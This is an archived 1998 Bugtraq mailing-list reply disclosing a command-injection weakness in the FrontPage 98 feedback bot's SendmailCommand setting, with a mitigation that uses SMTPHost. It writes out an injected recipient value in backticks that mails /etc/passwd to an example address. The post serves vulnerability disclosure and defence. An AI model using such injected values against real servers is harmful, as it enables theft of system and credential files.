[8212] in bugtraq
Re: Followup to FP98 and other Frontpage bugs
daemon@ATHENA.MIT.EDU (Markus Stumpf)
Wed Oct 14 15:41:13 1998
Date: Wed, 14 Oct 1998 02:21:34 +0200
Reply-To: Markus Stumpf <maex-lists-bugtraq@SPACE.NET>
From: Markus Stumpf <maex-lists-bugtraq@SPACE.NET>
X-To: pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199810121822.LAA11180@eris.webcom.com>; from pedward@WEBCOM.COM
on Mon, Oct 12, 1998 at 11:22:38AM -0700
On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedward@WEBCOM.COM wrote:
> So, here is the status of Frontpage and it's (in)security.
Don't know whether this has already been reported.
I've noticed another weakness which is still present at least in
FP98 with the version id:
FPVersion="3.0.2.1330"
When installing a server for Frontpage it creates a file (usually)
/usr/local/frontpage/www.example.com:80.cnf
In order to get the feedback bot working for sending feedback via eMail
you can define within this file
SendmailCommand:/usr/sbin/sendmail %r
The "%r" above is substituted with the recipients email address(es).
With this setting you are vulnerable, as creating a feedback page
with a recipient address of e.g.
`/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`
will execute the command
/usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody@example.com < /etc/passwd`
and send the password file to nobody@example.com.
To avoid this tell Frontpage to use the SMTP protocol to send emails
by using
SMTPHost:mail.example.com
and you may probably also use
MailSender:webmaster@example.com
\Maex
--
SpaceNet GmbH | http://www.Space.Net/ | In a world whithout
Research & Development | mailto:research@Space.Net | walls and fences,
Frankfurter Ring 193a | Tel: +49 (89) 32356-0 | who needs
D-80807 Muenchen | Fax: +49 (89) 32356-299 | Windows and Gates?
